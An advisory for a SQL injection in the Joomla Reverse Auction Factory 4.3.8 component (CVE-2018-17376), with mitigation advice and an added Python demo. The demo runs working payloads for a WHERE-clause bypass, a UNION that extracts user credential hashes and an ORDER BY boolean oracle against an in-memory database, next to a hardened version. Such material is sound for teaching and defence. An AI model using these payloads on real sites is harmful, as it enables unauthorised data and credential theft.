vendor:
Reverse Auction Factory
by:
Ihsan Sencan
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Reverse Auction Factory
Affected Version From: 4.3.8
Affected Version To: 4.3.8
Patch Exists: NO
Related CVE: CVE-2018-17376
CPE: a:thephpfactory:reverse_auction_factory:4.3.8
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: Windows 7 x64 / Kali Linux x64
2018
Joomla! Component Reverse Auction Factory 4.3.8 – SQL Injection
Joomla! Component Reverse Auction Factory 4.3.8 is vulnerable to SQL injection. The 'filter_order_Dir', 'cat' and 'filter_letter' request parameters handled by 'index.php' are placed into database queries without sanitisation or parameter binding, so an attacker can append arbitrary SQL to them. 'filter_order_Dir' is the standard Joomla list sort direction and ends up in an ORDER BY clause, where a value cannot be bound as a parameter and must be validated instead; 'cat' and 'filter_letter' feed the WHERE clause. The CVSS 9.8 rating reflects that no authentication is required. Successful exploitation may allow a remote attacker to read or modify any data reachable by the site's database account, including the Joomla user table, or to reach weaknesses in the underlying database server.
Mitigation:
Build every query with prepared statements and bound parameters (or, at minimum, the database API's quoting functions) rather than string concatenation; input validation alone is not a reliable defence against SQL injection. Values that cannot be bound, such as the sort direction taken from 'filter_order_Dir', must be checked against an allowlist (accept only 'ASC' or 'DESC'), and 'cat' should be cast to an integer before it is used. The database account used by the site should hold only the privileges the application needs, with no access to other schemas or to file operations, so that a successful injection cannot escalate beyond the application's own data. As no vendor patch is listed for this version, consider disabling the component or restricting access to it until a fixed release is available.
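The following is an added example and is not code from the advisory or from the Reverse Auction Factory component, whose query code is not shown here. It reproduces the injection class described above (concatenating 'cat', 'filter_letter' and 'filter_order_Dir' into a listing query) and the hardened form from the mitigation, using Python and an in-memory SQLite database as a stand-in for the component's PHP/MySQL code. The table layout, the rows and the payloads are constructed for the demonstration; the three payloads show a WHERE-clause bypass that leaks unpublished rows, a UNION that returns the user table, and an ORDER BY boolean oracle that flips row order depending on a guessed character of the admin username.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the component's tables (not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE auctions (id INTEGER PRIMARY KEY, title TEXT, cat INTEGER, published INTEGER);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO auctions VALUES (1, 'Alpha', 1, 1), (2, 'Bravo', 1, 1),
                                    (3, 'Charlie', 2, 1), (4, 'Delta', 1, 0);
        INSERT INTO users VALUES (1, 'admin', '$2y$10$constructedhash');
    """)
    return conn


def vulnerable_listing(conn, cat, filter_letter, filter_order_dir):
    """The pattern the advisory describes: request parameters spliced into SQL."""
    sql = ("SELECT title FROM auctions WHERE published = 1"
           " AND cat = " + cat +
           " AND title LIKE '" + filter_letter + "%'"
           " ORDER BY title " + filter_order_dir)
    return [row[0] for row in conn.execute(sql)]


def hardened_listing(conn, cat, filter_letter, filter_order_dir):
    """Bound parameters for values, an allowlist for the ORDER BY direction."""
    direction = "DESC" if filter_order_dir.upper() == "DESC" else "ASC"
    cat_id = int(cat)  # raises ValueError on anything that is not an integer
    # Escape LIKE metacharacters so the prefix is matched literally.
    prefix = (filter_letter.replace("\\", "\\\\")
                           .replace("%", "\\%")
                           .replace("_", "\\_"))
    sql = ("SELECT title FROM auctions WHERE published = 1 AND cat = ?"
           " AND title LIKE ? ESCAPE '\\' ORDER BY title " + direction)
    return [row[0] for row in conn.execute(sql, (cat_id, prefix + "%"))]


# Constructed payloads for the three parameters named in the advisory.
# The trailing space after '--' is required by MySQL; SQLite accepts it too.
CAT_PAYLOAD = "0 OR 1=1 -- "
LETTER_PAYLOAD = "' UNION SELECT username || ':' || password FROM users -- "


def dir_payload(guess):
    """ORDER BY direction as a boolean oracle: the sort key becomes -id when the
    first character of the admin username equals `guess`, else id, so the row
    order reveals the answer. (title * 0 evaluates to 0 in SQLite arithmetic.)"""
    return ("* 0 + (CASE WHEN (SELECT substr(username, 1, 1) FROM users WHERE id = 1)"
            " = '" + guess + "' THEN -id ELSE id END)")


def run_demo():
    """Runs each payload against both query builders and returns the outcomes."""
    conn = make_db()
    results = {
        "cat_leak": sorted(vulnerable_listing(conn, CAT_PAYLOAD, "", "ASC")),
        "letter_union": vulnerable_listing(conn, "1", LETTER_PAYLOAD, "ASC"),
        "dir_true": vulnerable_listing(conn, "1", "", dir_payload("a")),
        "dir_false": vulnerable_listing(conn, "1", "", dir_payload("z")),
        "hardened_letter": hardened_listing(conn, "1", LETTER_PAYLOAD, "ASC"),
        "hardened_dir": hardened_listing(conn, "1", "", dir_payload("a")),
    }
    try:
        hardened_listing(conn, CAT_PAYLOAD, "", "ASC")
        results["hardened_cat"] = "accepted"
    except ValueError:
        results["hardened_cat"] = "rejected"
    return results


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(name, value)
```

In the vulnerable builder the 'cat' payload comments out the rest of the WHERE clause and exposes the unpublished 'Delta' row, the 'filter_letter' payload returns the admin credential hash in place of auction titles, and the two 'filter_order_Dir' payloads return the same two rows in opposite orders, which is enough to extract the username one character at a time. The hardened builder rejects the non-integer 'cat', matches the UNION payload as a literal title prefix (no rows), and silently falls back to ASC for the ORDER BY probe.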